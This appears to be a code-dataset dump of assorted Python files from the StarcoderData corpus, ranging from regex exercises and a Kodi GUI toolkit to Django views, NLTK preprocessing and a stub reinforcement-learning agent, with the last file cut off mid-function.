id
stringlengths 1
265
| text
stringlengths 6
5.19M
| dataset_id
stringclasses 7
values |
---|---|---|
150961 | import re
patterns = ["term1", "term2"]
text = "This is a string with term1, not the other"
split_term = "@"
email = "<EMAIL>"
# for pattern in patterns:
# print("I'm searching for: " + pattern)
#
# if re.search(pattern, text):
# print("MATCH!")
# else:
# print("NO MATCH!")
print(re.split(split_term, email)) # email.split("@")
# print(match.start())
print(re.findall("match", "test phrase match in match middle"))
def multi_re_find(patterns, phrase):
for pat in patterns:
print("Searching for pattern {}".format(pat))
print(re.findall(pat, phrase))
print("\n")
# test_phrase = "sdsd..sssddd..sdddsddd...dsds...dssssss...sddddd"
# test_patterns = ["s[sd]+"]
# test_phrase = "This is a string! But it has punctuation. How can we remove it?"
# test_patterns = ["[^!.?]+"]
# test_patterns = ["[A-Z]+"]
test_phrase = "This is a string with numbers 12312 and a symbol #hashtag"
# d - digits
# D - non-digits
# s - whitespace
# S - non-whitespace
# w - alphanumeric characters
# W - non-alphanumeric characters
test_patterns = [r"\W+"]
multi_re_find(test_patterns, test_phrase)
| StarcoderdataPython |
3285420 | class Solution:
def judgeCircle(self, moves: str) -> bool:
U, D, L, R = moves.count('U'), moves.count('D'), moves.count('L'), moves.count('R')
if U == D and L == R:
return True
else:
return False
| StarcoderdataPython |
3237865 | <filename>lingofunk_classify_sentiment/model/naive_bayes/preprocess.py
import itertools
import re
from nltk.collocations import BigramCollocationFinder
from nltk.corpus import stopwords
from nltk.metrics import BigramAssocMeasures
from nltk.tokenize import word_tokenize
def tokenize(text):
"""Splits a text to words, separates by space and punctuation,
converts to lowercase."""
return map(lambda token: token.lower(), re.findall(r"[\w']+|[.,!?;-]", text))
def remove_stopwords_and_include_bigrams(
text, score_fn=BigramAssocMeasures.chi_sq, n_bigrams=500
):
stopset = set(stopwords.words("english"))
words = [word for word in tokenize(text) if word not in stopset]
bigram_finder = BigramCollocationFinder.from_words(words)
bigrams = bigram_finder.nbest(score_fn, n_bigrams)
return dict([(ngram, True) for ngram in itertools.chain(words, bigrams)])
| StarcoderdataPython |
89772 | <gh_stars>0
#
# Copyright (C) Analytics Engines 2021
# <NAME> (<EMAIL>)
#
import pandas as pd
import streamlit as st
st.set_page_config(layout="wide")
import requests
import streamlit_bd_cytoscapejs
from common import login,init_state,base_url,format_request,local_css
init_state(['jwt','login_request'])
local_css("colorful.css")
st.markdown("""
# Login
""")
user_name = st.text_input('Username','<EMAIL>')
password = st.text_input('Password','<PASSWORD>!',type='password')
jwt_output = st.empty()
st.button('Click To Login',on_click=lambda: login(user_name,password))
st.write("Login HTTP Request will appear below on click")
st.markdown(st.session_state.login_request,unsafe_allow_html=True)
st.write({"jwt" : st.session_state.jwt}) | StarcoderdataPython |
1700020 | import sys
with open(sys.argv[1]) as input_file:
for problem in input_file.readlines():
print(problem.strip().split(' ')[-2])
| StarcoderdataPython |
3286564 | <gh_stars>1-10
# -*- coding: utf-8 -*-
import xbmc
import xbmcgui
import time
import threading
import traceback
MONITOR = None
class BaseFunctions:
xmlFile = ''
path = ''
theme = ''
res = '720p'
width = 1280
height = 720
usesGenerate = False
def __init__(self):
self.isOpen = True
def onWindowFocus(self):
# Not automatically called. Can be used by an external window manager
pass
def onClosed(self):
pass
@classmethod
def open(cls, **kwargs):
window = cls(cls.xmlFile, cls.path, cls.theme, cls.res, **kwargs)
window.modal()
return window
@classmethod
def create(cls, show=True, **kwargs):
window = cls(cls.xmlFile, cls.path, cls.theme, cls.res, **kwargs)
if show:
window.show()
window.isOpen = True
return window
def modal(self):
self.isOpen = True
self.doModal()
self.onClosed()
self.isOpen = False
def activate(self):
if not self._winID:
self._winID = xbmcgui.getCurrentWindowId()
xbmc.executebuiltin('ReplaceWindow({0})'.format(self._winID))
def mouseXTrans(self, val):
return int((val / self.getWidth()) * self.width)
def mouseYTrans(self, val):
return int((val / self.getHeight()) * self.height)
def closing(self):
return self._closing
@classmethod
def generate(self):
return None
def setProperties(self, prop_list, val_list_or_val):
if isinstance(val_list_or_val, list) or isinstance(val_list_or_val, tuple):
val_list = val_list_or_val
else:
val_list = [val_list_or_val] * len(prop_list)
for prop, val in zip(prop_list, val_list):
self.setProperty(prop, val)
def propertyContext(self, prop, val='1'):
return WindowProperty(self, prop, val)
def setBoolProperty(self, key, boolean):
self.setProperty(key, boolean and '1' or '')
class BaseWindow(xbmcgui.WindowXML, BaseFunctions):
def __init__(self, *args, **kwargs):
BaseFunctions.__init__(self)
self._closing = False
self._winID = None
self.started = False
self.finishedInit = False
def onInit(self):
self._winID = xbmcgui.getCurrentWindowId()
if self.started:
self.onReInit()
else:
self.started = True
self.onFirstInit()
self.finishedInit = True
def onFirstInit(self):
pass
def onReInit(self):
pass
def setProperty(self, key, value):
if self._closing:
return
if not self._winID:
self._winID = xbmcgui.getCurrentWindowId()
try:
xbmcgui.Window(self._winID).setProperty(key, value)
xbmcgui.WindowXML.setProperty(self, key, value)
except RuntimeError:
xbmc.log('kodigui.BaseWindow.setProperty: Missing window', xbmc.LOGDEBUG)
def doClose(self):
if not self.isOpen:
return
self._closing = True
self.isOpen = False
self.close()
def show(self):
self._closing = False
self.isOpen = True
xbmcgui.WindowXML.show(self)
def onClosed(self):
pass
class BaseDialog(xbmcgui.WindowXMLDialog, BaseFunctions):
def __init__(self, *args, **kwargs):
BaseFunctions.__init__(self)
self._closing = False
self._winID = ''
self.started = False
def onInit(self):
self._winID = xbmcgui.getCurrentWindowDialogId()
if self.started:
self.onReInit()
else:
self.started = True
self.onFirstInit()
def onFirstInit(self):
pass
def onReInit(self):
pass
def setProperty(self, key, value):
if self._closing:
return
if not self._winID:
self._winID = xbmcgui.getCurrentWindowId()
try:
xbmcgui.Window(self._winID).setProperty(key, value)
xbmcgui.WindowXMLDialog.setProperty(self, key, value)
except RuntimeError:
xbmc.log('kodigui.BaseDialog.setProperty: Missing window', xbmc.LOGDEBUG)
def doClose(self):
self._closing = True
self.close()
def show(self):
self._closing = False
xbmcgui.WindowXMLDialog.show(self)
def onClosed(self):
pass
class ControlledBase:
def doModal(self):
self.show()
self.wait()
def wait(self):
while not self._closing and not MONITOR.waitForAbort(0.1):
pass
def close(self):
self._closing = True
class ControlledWindow(ControlledBase, BaseWindow):
def onAction(self, action):
try:
if action in (xbmcgui.ACTION_PREVIOUS_MENU, xbmcgui.ACTION_NAV_BACK):
self.doClose()
return
except:
traceback.print_exc()
BaseWindow.onAction(self, action)
class ControlledDialog(ControlledBase, BaseDialog):
def onAction(self, action):
try:
if action in (xbmcgui.ACTION_PREVIOUS_MENU, xbmcgui.ACTION_NAV_BACK):
self.doClose()
return
except:
traceback.print_exc()
BaseDialog.onAction(self, action)
DUMMY_LIST_ITEM = xbmcgui.ListItem()
class ManagedListItem(object):
def __init__(self, label='', label2='', iconImage='', thumbnailImage='', path='', data_source=None, properties=None):
self._listItem = xbmcgui.ListItem(label, label2, iconImage, thumbnailImage, path)
self.dataSource = data_source
self.properties = {}
self.label = label
self.label2 = label2
self.iconImage = iconImage
self.thumbnailImage = thumbnailImage
self.path = path
self._ID = None
self._manager = None
self._valid = True
if properties:
for k, v in properties.items():
self.setProperty(k, v)
def __nonzero__(self):
return self._valid
@property
def listItem(self):
if not self._listItem:
if not self._manager:
return None
try:
self._listItem = self._manager.getListItemFromManagedItem(self)
except RuntimeError:
return None
return self._listItem
def invalidate(self):
self._valid = False
self._listItem = DUMMY_LIST_ITEM
def _takeListItem(self, manager, lid):
self._manager = manager
self._ID = lid
self._listItem.setProperty('__ID__', lid)
li = self._listItem
self._listItem = None
self._manager._properties.update(self.properties)
return li
def _updateListItem(self):
self.listItem.setProperty('__ID__', self._ID)
self.listItem.setLabel(self.label)
self.listItem.setLabel2(self.label2)
self.listItem.setIconImage(self.iconImage)
self.listItem.setThumbnailImage(self.thumbnailImage)
self.listItem.setPath(self.path)
for k in self._manager._properties.keys():
self.listItem.setProperty(k, self.properties.get(k) or '')
def clear(self):
self.label = ''
self.label2 = ''
self.iconImage = ''
self.thumbnailImage = ''
self.path = ''
for k in self.properties:
self.properties[k] = ''
self._updateListItem()
def pos(self):
if not self._manager:
return None
return self._manager.getManagedItemPosition(self)
def addContextMenuItems(self, items, replaceItems=False):
self.listItem.addContextMenuItems(items, replaceItems)
def addStreamInfo(self, stype, values):
self.listItem.addStreamInfo(stype, values)
def getLabel(self):
return self.label
def getLabel2(self):
return self.label2
def getProperty(self, key):
return self.properties.get(key, '')
def getdescription(self):
return self.listItem.getdescription()
def getduration(self):
return self.listItem.getduration()
def getfilename(self):
return self.listItem.getfilename()
def isSelected(self):
return self.listItem.isSelected()
def select(self, selected):
return self.listItem.select(selected)
def setArt(self, values):
return self.listItem.setArt(values)
def setIconImage(self, icon):
self.iconImage = icon
return self.listItem.setIconImage(icon)
def setInfo(self, itype, infoLabels):
return self.listItem.setInfo(itype, infoLabels)
def setLabel(self, label):
self.label = label
return self.listItem.setLabel(label)
def setLabel2(self, label):
self.label2 = label
return self.listItem.setLabel2(label)
def setMimeType(self, mimetype):
return self.listItem.setMimeType(mimetype)
def setPath(self, path):
self.path = path
return self.listItem.setPath(path)
def setProperty(self, key, value):
if self._manager:
self._manager._properties[key] = 1
self.properties[key] = value
self.listItem.setProperty(key, value)
return self
def setBoolProperty(self, key, boolean):
return self.setProperty(key, boolean and '1' or '')
def setSubtitles(self, subtitles):
return self.listItem.setSubtitles(subtitles) # List of strings - HELIX
def setThumbnailImage(self, thumb):
self.thumbnailImage = thumb
return self.listItem.setThumbnailImage(thumb)
def onDestroy(self):
pass
class ManagedControlList(object):
def __init__(self, window, control_id, max_view_index, data_source=None):
self.controlID = control_id
self.control = window.getControl(control_id)
self.items = []
self._sortKey = None
self._idCounter = 0
self._maxViewIndex = max_view_index
self._properties = {}
self.dataSource = data_source
def __getattr__(self, name):
return getattr(self.control, name)
def __getitem__(self, idx):
if isinstance(idx, slice):
return self.items[idx]
else:
return self.getListItem(idx)
def __iter__(self):
for i in self.items:
yield i
def __len__(self):
return self.size()
def _updateItems(self, bottom=None, top=None):
if bottom is None:
bottom = 0
top = self.size()
try:
for idx in range(bottom, top):
li = self.control.getListItem(idx)
mli = self.items[idx]
self._properties.update(mli.properties)
mli._manager = self
mli._listItem = li
mli._updateListItem()
except RuntimeError:
xbmc.log('kodigui.ManagedControlList._updateItems: Runtime error', xbmc.LOGNOTICE)
return False
return True
def _nextID(self):
self._idCounter += 1
return str(self._idCounter)
def reInit(self, window, control_id):
self.controlID = control_id
self.control = window.getControl(control_id)
self.control.addItems([i._takeListItem(self, self._nextID()) for i in self.items])
def setSort(self, sort):
self._sortKey = sort
def addItem(self, managed_item):
self.items.append(managed_item)
self.control.addItem(managed_item._takeListItem(self, self._nextID()))
def addItems(self, managed_items):
self.items += managed_items
self.control.addItems([i._takeListItem(self, self._nextID()) for i in managed_items])
def replaceItem(self, pos, mli):
self[pos].onDestroy()
self[pos].invalidate()
self.items[pos] = mli
li = self.control.getListItem(pos)
mli._manager = self
mli._listItem = li
mli._updateListItem()
def replaceItems(self, managed_items):
if not self.items:
self.addItems(managed_items)
return True
oldSize = self.size()
for i in self.items:
i.onDestroy()
i.invalidate()
self.items = managed_items
size = self.size()
if size != oldSize:
pos = self.getSelectedPosition()
if size > oldSize:
for i in range(0, size - oldSize):
self.control.addItem(xbmcgui.ListItem())
elif size < oldSize:
diff = oldSize - size
idx = oldSize - 1
while diff:
self.control.removeItem(idx)
idx -= 1
diff -= 1
if self.positionIsValid(pos):
self.selectItem(pos)
elif pos >= size:
self.selectItem(size - 1)
self._updateItems(0, self.size())
def getListItem(self, pos):
li = self.control.getListItem(pos)
mli = self.items[pos]
mli._listItem = li
return mli
def getListItemByDataSource(self, data_source):
for mli in self:
if data_source == mli.dataSource:
return mli
return None
def getSelectedItem(self):
pos = self.control.getSelectedPosition()
if not self.positionIsValid(pos):
pos = self.size() - 1
if pos < 0:
return None
return self.getListItem(pos)
def removeItem(self, index):
old = self.items.pop(index)
old.onDestroy()
old.invalidate()
self.control.removeItem(index)
top = self.control.size() - 1
if top < 0:
return
if top < index:
index = top
self.control.selectItem(index)
def removeManagedItem(self, mli):
self.removeItem(mli.pos())
def insertItem(self, index, managed_item):
pos = self.getSelectedPosition() + 1
if index >= self.size() or index < 0:
self.addItem(managed_item)
else:
self.items.insert(index, managed_item)
self.control.addItem(managed_item._takeListItem(self, self._nextID()))
self._updateItems(index, self.size())
if self.positionIsValid(pos):
self.selectItem(pos)
def moveItem(self, mli, dest_idx):
source_idx = mli.pos()
if source_idx < dest_idx:
rstart = source_idx
rend = dest_idx + 1
# dest_idx-=1
else:
rstart = dest_idx
rend = source_idx + 1
mli = self.items.pop(source_idx)
self.items.insert(dest_idx, mli)
self._updateItems(rstart, rend)
def swapItems(self, pos1, pos2):
if not self.positionIsValid(pos1) or not self.positionIsValid(pos2):
return False
item1 = self.items[pos1]
item2 = self.items[pos2]
li1 = item1._listItem
li2 = item2._listItem
item1._listItem = li2
item2._listItem = li1
item1._updateListItem()
item2._updateListItem()
self.items[pos1] = item2
self.items[pos2] = item1
return True
def shiftView(self, shift, hold_selected=False):
if not self._maxViewIndex:
return
selected = self.getSelectedItem()
selectedPos = selected.pos()
viewPos = self.getViewPosition()
if shift > 0:
pushPos = selectedPos + (self._maxViewIndex - viewPos) + shift
if pushPos >= self.size():
pushPos = self.size() - 1
self.selectItem(pushPos)
newViewPos = self._maxViewIndex
elif shift < 0:
pushPos = (selectedPos - viewPos) + shift
if pushPos < 0:
pushPos = 0
self.selectItem(pushPos)
newViewPos = 0
if hold_selected:
self.selectItem(selected.pos())
else:
diff = newViewPos - viewPos
fix = pushPos - diff
# print '{0} {1} {2}'.format(newViewPos, viewPos, fix)
if self.positionIsValid(fix):
self.selectItem(fix)
def reset(self):
self.dataSource = None
for i in self.items:
i.onDestroy()
i.invalidate()
self.items = []
self.control.reset()
def size(self):
return len(self.items)
def getViewPosition(self):
try:
return int(xbmc.getInfoLabel('Container({0}).Position'.format(self.controlID)))
except:
return 0
def getViewRange(self):
viewPosition = self.getViewPosition()
selected = self.getSelectedPosition()
return range(max(selected - viewPosition, 0), min(selected + (self._maxViewIndex - viewPosition) + 1, self.size() - 1))
def positionIsValid(self, pos):
return 0 <= pos < self.size()
def sort(self, sort=None, reverse=False):
sort = sort or self._sortKey
self.items.sort(key=sort, reverse=reverse)
self._updateItems(0, self.size())
def reverse(self):
self.items.reverse()
self._updateItems(0, self.size())
def getManagedItemPosition(self, mli):
return self.items.index(mli)
def getListItemFromManagedItem(self, mli):
pos = self.items.index(mli)
return self.control.getListItem(pos)
def topHasFocus(self):
return self.getSelectedPosition() == 0
def bottomHasFocus(self):
return self.getSelectedPosition() == self.size() - 1
def invalidate(self):
for item in self.items:
item._listItem = DUMMY_LIST_ITEM
def newControl(self, window=None, control_id=None):
self.controlID = control_id or self.controlID
self.control = window.getControl(self.controlID)
self.control.addItems([xbmcgui.ListItem() for i in range(self.size())])
self._updateItems()
class _MWBackground(ControlledWindow):
def __init__(self, *args, **kwargs):
self._multiWindow = kwargs.get('multi_window')
self.started = False
BaseWindow.__init__(self, *args, **kwargs)
def onInit(self):
if self.started:
return
self.started = True
self._multiWindow._open()
self.close()
class MultiWindow(object):
def __init__(self, windows=None, default_window=None, **kwargs):
self._windows = windows
self._next = default_window or self._windows[0]
self._properties = {}
self._current = None
self._allClosed = False
self.exitCommand = None
def __getattr__(self, name):
return getattr(self._current, name)
def setWindows(self, windows):
self._windows = windows
def setDefault(self, default):
self._next = default or self._windows[0]
def windowIndex(self, window):
if hasattr(window, 'MULTI_WINDOW_ID'):
for i, w in enumerate(self._windows):
if window.MULTI_WINDOW_ID == w.MULTI_WINDOW_ID:
return i
return 0
else:
return self._windows.index(window.__class__)
def nextWindow(self, window=None):
if window is False:
window = self._windows[self.windowIndex(self._current)]
if window:
if window.__class__ == self._current.__class__:
return None
else:
idx = self.windowIndex(self._current)
idx += 1
if idx >= len(self._windows):
idx = 0
window = self._windows[idx]
self._next = window
self._current.doClose()
return self._next
def _setupCurrent(self, cls):
self._current = cls(cls.xmlFile, cls.path, cls.theme, cls.res)
self._current.onFirstInit = self._onFirstInit
self._current.onReInit = self.onReInit
self._current.onClick = self.onClick
self._current.onFocus = self.onFocus
self._currentOnAction = self._current.onAction
self._current.onAction = self.onAction
@classmethod
def open(cls, **kwargs):
mw = cls(**kwargs)
b = _MWBackground(mw.bgXML, mw.path, mw.theme, mw.res, multi_window=mw)
b.modal()
del b
import gc
gc.collect(2)
return mw
def _open(self):
while not xbmc.abortRequested and not self._allClosed:
self._setupCurrent(self._next)
self._current.modal()
self._current.doClose()
del self._current
del self._next
del self._currentOnAction
def setProperty(self, key, value):
self._properties[key] = value
self._current.setProperty(key, value)
def _onFirstInit(self):
for k, v in self._properties.items():
self._current.setProperty(k, v)
self.onFirstInit()
def doClose(self):
self._allClosed = True
self._current.doClose()
def onFirstInit(self):
pass
def onReInit(self):
pass
def onAction(self, action):
if action == xbmcgui.ACTION_PREVIOUS_MENU or action == xbmcgui.ACTION_NAV_BACK:
self.doClose()
self._currentOnAction(action)
def onClick(self, controlID):
pass
def onFocus(self, controlID):
pass
class SafeControlEdit(object):
CHARS_LOWER = 'abcdefghijklmnopqrstuvwxyz'
CHARS_UPPER = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
CHARS_NUMBERS = '0123456789'
CURSOR = '[COLOR FFCC7B19]|[/COLOR]'
def __init__(self, control_id, label_id, window, key_callback=None, grab_focus=False):
self.controlID = control_id
self.labelID = label_id
self._win = window
self._keyCallback = key_callback
self.grabFocus = grab_focus
self._text = ''
self._compatibleMode = False
self.setup()
def setup(self):
self._labelControl = self._win.getControl(self.labelID)
self._winOnAction = self._win.onAction
self._win.onAction = self.onAction
self.updateLabel()
def setCompatibleMode(self, on):
self._compatibleMode = on
def onAction(self, action):
try:
controlID = self._win.getFocusId()
if controlID == self.controlID:
if self.processAction(action.getId()):
return
elif self.grabFocus:
if self.processOffControlAction(action.getButtonCode()):
self._win.setFocusId(self.controlID)
return
except:
traceback.print_exc()
self._winOnAction(action)
def processAction(self, action_id):
if not self._compatibleMode:
self._text = self._win.getControl(self.controlID).getText()
if self._keyCallback:
self._keyCallback()
self. updateLabel()
return True
if 61793 <= action_id <= 61818: # Lowercase
self.processChar(self.CHARS_LOWER[action_id - 61793])
elif 61761 <= action_id <= 61786: # Uppercase
self.processChar(self.CHARS_UPPER[action_id - 61761])
elif 61744 <= action_id <= 61753:
self.processChar(self.CHARS_NUMBERS[action_id - 61744])
elif action_id == 61728: # Space
self.processChar(' ')
elif action_id == 61448:
self.delete()
else:
return False
if self._keyCallback:
self._keyCallback()
return True
def processOffControlAction(self, action_id):
if 61505 <= action_id <= 61530: # Lowercase
self.processChar(self.CHARS_LOWER[action_id - 61505])
elif 192577 <= action_id <= 192602: # Uppercase
self.processChar(self.CHARS_UPPER[action_id - 192577])
elif 61488 <= action_id <= 61497:
self.processChar(self.CHARS_NUMBERS[action_id - 61488])
elif 61552 <= action_id <= 61561:
self.processChar(self.CHARS_NUMBERS[action_id - 61552])
elif action_id == 61472: # Space
self.processChar(' ')
else:
return False
if self._keyCallback:
self._keyCallback()
return True
def _setText(self, text):
self._text = text
if not self._compatibleMode:
self._win.getControl(self.controlID).setText(text)
self.updateLabel()
def _getText(self):
if not self._compatibleMode and self._win.getFocusId() == self.controlID:
return self._win.getControl(self.controlID).getText()
else:
return self._text
def updateLabel(self):
self._labelControl.setLabel(self._getText() + self.CURSOR)
def processChar(self, char):
self._setText(self.getText() + char)
def setText(self, text):
self._setText(text)
def getText(self):
return self._getText()
def append(self, text):
self._setText(self.getText() + text)
def delete(self):
self._setText(self.getText()[:-1])
class PropertyTimer():
def __init__(self, window_id, timeout, property_, value='', init_value='1', addon_id=None, callback=None):
self._winID = window_id
self._timeout = timeout
self._property = property_
self._value = value
self._initValue = init_value
self._endTime = 0
self._thread = None
self._addonID = addon_id
self._closeWin = None
self._closed = False
self._callback = callback
def _onTimeout(self):
self._endTime = 0
xbmcgui.Window(self._winID).setProperty(self._property, self._value)
if self._addonID:
xbmcgui.Window(10000).setProperty('{0}.{1}'.format(self._addonID, self._property), self._value)
if self._closeWin:
self._closeWin.doClose()
if self._callback:
self._callback()
def _wait(self):
while not xbmc.abortRequested and time.time() < self._endTime:
xbmc.sleep(100)
if xbmc.abortRequested:
return
if self._endTime == 0:
return
self._onTimeout()
def _stopped(self):
return not self._thread or not self._thread.isAlive()
def _reset(self):
self._endTime = time.time() + self._timeout
def _start(self):
self.init(self._initValue)
self._thread = threading.Thread(target=self._wait)
self._thread.start()
def stop(self, trigger=False):
self._endTime = trigger and 1 or 0
if not self._stopped():
self._thread.join()
def close(self):
self._closed = True
self.stop()
def init(self, val):
if val is False:
return
elif val is None:
val = self._initValue
xbmcgui.Window(self._winID).setProperty(self._property, val)
if self._addonID:
xbmcgui.Window(10000).setProperty('{0}.{1}'.format(self._addonID, self._property), val)
def reset(self, close_win=None, init=None):
self.init(init)
if self._closed:
return
if not self._timeout:
return
self._closeWin = close_win
self._reset()
if self._stopped:
self._start()
class WindowProperty():
def __init__(self, win, prop, val='1', end=None):
self.win = win
self.prop = prop
self.val = val
self.end = end
self.old = self.win.getProperty(self.prop)
def __enter__(self):
self.win.setProperty(self.prop, self.val)
return self
def __exit__(self, exc_type, exc_value, traceback):
self.win.setProperty(self.prop, self.end or self.old)
class GlobalProperty():
def __init__(self, prop, val='1', end=None):
import xbmcaddon
self._addonID = xbmcaddon.Addon().getAddonInfo('id')
self.prop = prop
self.val = val
self.end = end
self.old = xbmc.getInfoLabel('Window(10000).Property({0}}.{1})'.format(self._addonID, prop))
def __enter__(self):
xbmcgui.Window(10000).setProperty('{0}.{1}'.format(self._addonID, self.prop), self.val)
return self
def __exit__(self, exc_type, exc_value, traceback):
xbmcgui.Window(10000).setProperty('{0}.{1}'.format(self._addonID, self.prop), self.end or self.old)
| StarcoderdataPython |
1661271 | # Generated by Django 2.1.2 on 2018-10-20 11:56
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('incidentes', '0003_auto_20181020_0817'),
]
operations = [
migrations.RenameField(
model_name='ticket',
old_name='grupo',
new_name='grupo_destino',
),
migrations.AlterField(
model_name='ticket',
name='equipo',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='incidentes.Equipos'),
),
migrations.RemoveField(
model_name='usuario',
name='grupo',
),
migrations.AddField(
model_name='usuario',
name='grupo',
field=models.ManyToManyField(to='incidentes.Grupo'),
),
]
| StarcoderdataPython |
109783 | <filename>codebase_analizer/project.py
import os
import shutil
import tempfile
from contextlib import contextmanager
# Python 2/3 compatibility
from builtins import object
class Project(object):
def __init__(self, project_location):
self._project_location = project_location
self._tmpdir = tempfile.gettempdir()
@property
def should_be_clonned(self):
return self._project_location.startswith('http')
@property
def name(self):
project_name = self._project_location.split('/')[-1]
if self.should_be_clonned:
# Truncate .git postfix
project_name = project_name.split('.git')[0]
return project_name
@property
def path(self):
if self.should_be_clonned:
# Return path where projects are cloned
return os.path.join(self._tmpdir, self.name)
return self._project_location
@contextmanager
def open(self):
"""Open project and return its path.
Clone the project if needed but clean after yourself.
"""
if self.should_be_clonned:
self._clone()
yield self.path
# Remove clonned project -
# user should not store folders he don't know about.
self._remove()
else:
yield self.path
def _clone(self):
assert self.should_be_clonned
os.system('git clone {repo_url} {directory}'.format(
repo_url=self._project_location,
directory=self.path
))
def _remove(self):
shutil.rmtree(self.path)
| StarcoderdataPython |
1651950 | <reponame>antoine-moulin/rlberry
import logging
import gym.spaces as spaces
import numpy as np
from rlberry.agents import IncrementalAgent
from rlberry.agents.adaptiveql.tree import MDPTreePartition
from rlberry.utils.writers import PeriodicWriter
logger = logging.getLogger(__name__)
class AdaMBAgent(IncrementalAgent):
"""
Model-Based Reinforcement Learning with Adaptive Partitioning [1]_
.. warning::
TO BE IMPLEMENTED, initially for enviroments with continuous (Box) states
and **discrete actions**.
Parameters
----------
env : gym.Env
Environment with discrete states and actions.
n_episodes : int
Number of episodes
gamma : double, default: 1.0
Discount factor in [0, 1].
horizon : int
Horizon of the objective function.
bonus_scale_factor : double, default: 1.0
Constant by which to multiply the exploration bonus, controls
the level of exploration.
bonus_type : {"simplified_bernstein"}
Type of exploration bonus. Currently, only "simplified_bernstein"
is implemented.
References
----------
.. [1] <NAME>., <NAME>., <NAME>., <NAME>., & <NAME>. (2020).
Adaptive Discretization for Model-Based Reinforcement Learning.
arXiv preprint arXiv:2007.00717.
Notes
------
Uses the metric induced by the l-infinity norm.
"""
name = 'AdaMBAgent'
def __init__(self,
env,
n_episodes=1000,
gamma=1.0,
horizon=50,
bonus_scale_factor=1.0,
bonus_type="simplified_bernstein",
**kwargs):
IncrementalAgent.__init__(self, env, **kwargs)
assert isinstance(self.env.observation_space, spaces.Box)
assert isinstance(self.env.action_space, spaces.Discrete)
self.n_episodes = n_episodes
self.gamma = gamma
self.horizon = horizon
self.bonus_scale_factor = bonus_scale_factor
self.bonus_type = bonus_type
# maximum value
r_range = self.env.reward_range[1] - self.env.reward_range[0]
if r_range == np.inf or r_range == 0.0:
logger.warning("{}: Reward range is zero or infinity. ".format(self.name)
+ "Setting it to 1.")
r_range = 1.0
self.v_max = np.zeros(self.horizon)
self.v_max[-1] = r_range
for hh in reversed(range(self.horizon-1)):
self.v_max[hh] = r_range + self.gamma*self.v_max[hh+1]
self.reset()
def reset(self):
# stores Q function and MDP model.
self.model = MDPTreePartition(self.env.observation_space,
self.env.action_space,
self.horizon)
# info
self._rewards = np.zeros(self.n_episodes)
self.episode = 0
# default writer
self.writer = PeriodicWriter(self.name,
log_every=5*logger.getEffectiveLevel())
def policy(self, observation, hh=0, **kwargs):
return 0
def _update(self, node, state, action, next_state, reward, hh):
pass
def _compute_bonus(self, n, hh):
if self.bonus_type == "simplified_bernstein":
bonus = self.bonus_scale_factor * np.sqrt(1.0 / n) + self.v_max[hh] / n
bonus = min(bonus, self.v_max[hh])
return bonus
else:
raise ValueError(
"Error: bonus type {} not implemented".format(self.bonus_type))
def _run_episode(self):
# interact for H steps
episode_rewards = 0
state = self.env.reset()
for hh in range(self.horizon):
action = 0 # TODO
next_state, reward, done, _ = self.env.step(action)
episode_rewards += reward
# self._update(node, state, action, next_state, reward, hh)
state = next_state
if done:
break
# update info
ep = self.episode
self._rewards[ep] = episode_rewards
self.episode += 1
# writer
if self.writer is not None:
self.writer.add_scalar("ep reward", episode_rewards, self.episode)
# return sum of rewards collected in the episode
return episode_rewards
def partial_fit(self, fraction, **kwargs):
assert 0.0 < fraction <= 1.0
n_episodes_to_run = int(np.ceil(fraction*self.n_episodes))
count = 0
while count < n_episodes_to_run and self.episode < self.n_episodes:
self._run_episode()
count += 1
info = {"n_episodes": self.episode,
"episode_rewards": self._rewards[:self.episode]}
return info
if __name__ == '__main__':
from rlberry.envs.benchmarks.ball_exploration.ball2d import get_benchmark_env
env = get_benchmark_env(level=2)
agent = AdaMBAgent(env, n_episodes=50, horizon=30)
agent.fit()
agent.policy(env.observation_space.sample())
| StarcoderdataPython |
16977 | import os, time, mimetypes, glob
from django.utils.translation import gettext_lazy as _
from django.urls import reverse
from task.const import *
from task.models import Task, detect_group
from rusel.base.config import Config
from rusel.base.forms import CreateGroupForm
from rusel.context import get_base_context
from rusel.utils import extract_get_params
class Context:
def set_config(self, config, cur_view):
self.config = Config(config, cur_view)
def get_app_context(self, user_id, search_qty=None, icon=None, nav_items=None, **kwargs):
context = {}
if hasattr(self, 'object') and self.object:
title = self.object.name
else:
if 'title' in kwargs:
title = kwargs['title']
else:
title = _(self.config.title).capitalize()
nav_item = None
if (Task.get_nav_role(self.config.app) != self.config.get_cur_role()):
nav_item = Task.get_active_nav_item(user_id, self.config.app)
if nav_item:
title = (title, nav_item.name)
context['nav_item'] = nav_item
context.update(get_base_context(self.request, self.config.app, self.config.get_cur_role(), self.config.cur_view_group, (hasattr(self, 'object') and self.object != None), title, icon=icon))
context['fix_list'] = self.get_fixes(self.config.views, search_qty)
context['group_form'] = CreateGroupForm()
context['config'] = self.config
context['params'] = extract_get_params(self.request, self.config.group_entity)
if nav_items:
context['nav_items'] = nav_items
context['add_item_placeholder'] = '{} {}'.format(_('add').capitalize(), self.config.item_name if self.config.item_name else self.config.get_cur_role())
if self.config.add_button:
context['add_item_template'] = 'base/add_item_button.html'
else:
context['add_item_template'] = 'base/add_item_input.html'
if (self.config.group_entity in self.request.GET):
context['current_group'] = self.request.GET[self.config.group_entity]
elif ('ret' in self.request.GET):
context['current_group'] = self.request.GET['ret']
return context
def get_sorts(self, sorts):
ret = []
for sort in sorts:
ret.append({'id': sort[0], 'name': _(sort[1]).capitalize()})
return ret
def get_fixes(self, views, search_qty):
fixes = []
if (self.config.app == APP_ALL):
common_url = reverse('index')
else:
common_url = reverse(self.config.app + ':list')
nav_item=Task.get_active_nav_item(self.request.user.id, self.config.app)
for key, value in views.items():
url = common_url
determinator = 'view'
view_id = self.config.main_view
if (view_id != key):
if ('role' in value):
determinator = 'role'
view_id = value['role']
url += view_id + '/'
else:
view_id = key
if (key != self.config.main_view):
if ('page_url' in value):
url += value['page_url'] + '/'
else:
url += '?view=' + key
if (self.config.app in FOLDER_NAV_APPS):
folder = ''
if ('folder' in self.request.GET):
folder = self.request.GET['folder']
if folder:
if ('?' in url):
url += '&'
else:
url += '?'
url += 'folder=' + folder
hide_qty = False
if ('hide_qty' in value):
hide_qty = value['hide_qty']
if hide_qty:
qty = None
else:
if (view_id == self.config.group_entity):
_nav_item = None
else:
_nav_item = nav_item
fix_group = detect_group(self.request.user, self.config.app, determinator, view_id, _(value['title']).capitalize())
